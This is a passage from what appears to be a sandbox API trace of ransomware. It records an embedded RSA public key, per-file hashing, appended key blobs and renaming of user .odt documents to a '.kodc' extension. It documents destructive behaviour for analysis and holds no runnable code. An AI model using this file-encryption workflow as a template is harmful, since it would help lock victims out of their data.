returned 492 [0098.705] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0098.705] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.705] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.705] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x692d18) returned 1 [0098.706] CryptCreateHash (in: hProv=0x692d18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0098.706] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.706] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0098.706] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0098.706] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0098.706] GetLastError () returned 0x0 [0098.706] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0098.707] CryptReleaseContext (hProv=0x692d18, dwFlags=0x0) returned 1 [0098.707] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.707] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0098.707] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0098.707] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.707] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0098.707] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.707] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.707] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x71b0) returned 0x9ba4d90 [0098.707] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.707] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.707] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0098.707] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.707] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0098.707] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0098.707] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d4e0 [0098.707] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ab08 [0098.707] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d528 [0098.707] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ab20 [0098.707] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ab50 [0098.707] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.707] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ab68 [0098.707] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0098.707] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0098.707] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0098.708] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333a888 [0098.708] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ab50 | out: hHeap=0x630000) returned 1 [0098.708] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ab68 | out: hHeap=0x630000) returned 1 [0098.708] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.708] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0098.708] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0098.708] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.708] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0098.708] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331ab68 [0098.708] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0098.708] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331ab50 [0098.708] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0098.708] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c540 [0098.708] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0098.708] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0098.708] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0098.708] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c658 [0098.708] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0098.708] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.708] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0098.708] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ab68 | out: hHeap=0x630000) returned 1 [0098.708] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.708] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ab50 | out: hHeap=0x630000) returned 1 [0098.708] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0098.708] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.708] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.708] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0098.708] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0098.708] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.709] GetCurrentThreadId () returned 0x42c [0098.709] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0098.709] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9b8f508 [0098.709] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0098.709] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.709] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0098.709] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.709] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.709] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0098.709] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.709] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.709] GetCurrentThreadId () returned 0x42c [0098.709] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.709] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.709] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x71ac, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.709] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0098.710] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0098.710] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.710] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0098.710] CloseHandle (hObject=0x5cc) returned 1 [0098.711] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TBEA9Q3sVHj.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbea9q3svhj.odt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TBEA9Q3sVHj.odt.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbea9q3svhj.odt.kodc")) returned 1 [0098.712] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0098.712] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.712] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.713] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0098.713] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c7d9690, ftCreationTime.dwHighDateTime=0x1d5c149, ftLastAccessTime.dwLowDateTime=0x752d6730, ftLastAccessTime.dwHighDateTime=0x1d5bfc5, ftLastWriteTime.dwLowDateTime=0x752d6730, ftLastWriteTime.dwHighDateTime=0x1d5bfc5, nFileSizeHigh=0x0, nFileSizeLow=0x18449, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="trReD 97LkQS3Hk3.odt", cAlternateFileName="TRRED9~1.ODT")) returned 1 [0098.713] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\trReD 97LkQS3Hk3.odt") returned=".odt" [0098.713] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\trReD 97LkQS3Hk3.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\trred 97lkqs3hk3.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0098.713] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=99401) returned 1 [0098.713] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0098.716] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x18423, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.716] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0098.717] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.717] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.717] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.717] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x18449, lpOverlapped=0x0) returned 1 [0098.718] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.718] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0098.718] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.718] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.718] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x692d18) returned 1 [0098.719] CryptCreateHash (in: hProv=0x692d18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0098.719] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.719] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0098.719] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0098.719] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0098.719] GetLastError () returned 0x0 [0098.719] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0098.719] CryptReleaseContext (hProv=0x692d18, dwFlags=0x0) returned 1 [0098.719] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.719] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0098.719] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0098.719] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.719] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0098.719] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.719] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.719] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18450) returned 0x9ba4d90 [0098.720] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.720] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0098.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0098.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0098.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d528 [0098.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ab20 [0098.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d570 [0098.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ab38 [0098.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ab68 [0098.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ab80 [0098.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0098.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0098.720] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0098.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0098.720] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ab68 | out: hHeap=0x630000) returned 1 [0098.720] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ab80 | out: hHeap=0x630000) returned 1 [0098.720] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.720] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0098.720] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0098.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0098.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331ab80 [0098.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0098.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331ab68 [0098.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0098.721] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c658 [0098.721] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0098.721] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0098.721] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0098.721] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c770 [0098.721] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0098.721] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.721] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0098.721] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ab80 | out: hHeap=0x630000) returned 1 [0098.721] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.721] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ab68 | out: hHeap=0x630000) returned 1 [0098.721] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0098.721] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.721] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.721] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0098.721] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0098.721] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.721] GetCurrentThreadId () returned 0x42c [0098.721] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0098.721] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9b8f598 [0098.721] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0098.721] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.721] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0098.721] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.721] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.721] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0098.721] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.722] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.722] GetCurrentThreadId () returned 0x42c [0098.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.722] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0098.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.722] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.722] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.722] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0098.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0098.722] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318ea0 [0098.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0098.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.722] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0098.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0098.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0098.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0098.722] RtlAllocateHeap 